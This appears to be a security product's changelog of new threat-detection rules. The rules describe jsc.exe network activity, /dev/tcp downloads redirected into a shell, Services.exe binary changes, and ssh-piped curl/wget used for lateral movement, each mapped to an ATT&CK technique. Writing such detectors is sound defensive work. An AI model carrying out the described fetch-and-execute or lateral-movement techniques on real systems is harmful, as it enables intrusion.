==================================================

CREATED: WIN-JSC-NETCONN (#1832)

Description

This detector identifies the Microsoft JS compiler jsc.exe establishing network connections.

ATT&CK Technique T1064
ATT&CK Technique T1127

==================================================

CREATED: NIX-SHELL-DEV-TCP (#1844)

Description

Use of TCP sockets (/dev/tcp) to connect to a remote IP address and download files and then redirect into shell for execution. This method of connecting to a remote host with TCP sockets is an alternative technique to download files and behaves similarly to wget or curl.

ATT&CK Technique T1190

==================================================

CREATED: WIN-SERVICE-BIN-FILEMOD (#1874)

Description

The detector identifies the Windows Service Control Manager, Services.exe, creating or modifying a binary. Attackers may migrate processes to the Service Control Manager due to the stability of the process, and deploy different methods of persistence. 

ATT&CK Technique T1036

==================================================

CREATED: NIX-SSH-CURL-WGET-LATERAL (#1895)

Description

This detector identifies the use of ssh to send curl or wget commands to remote hosts, piping content into a shell. This technique has been used to move laterally on Linux systems.

ATT&CK Technique T1021

Did this answer your question?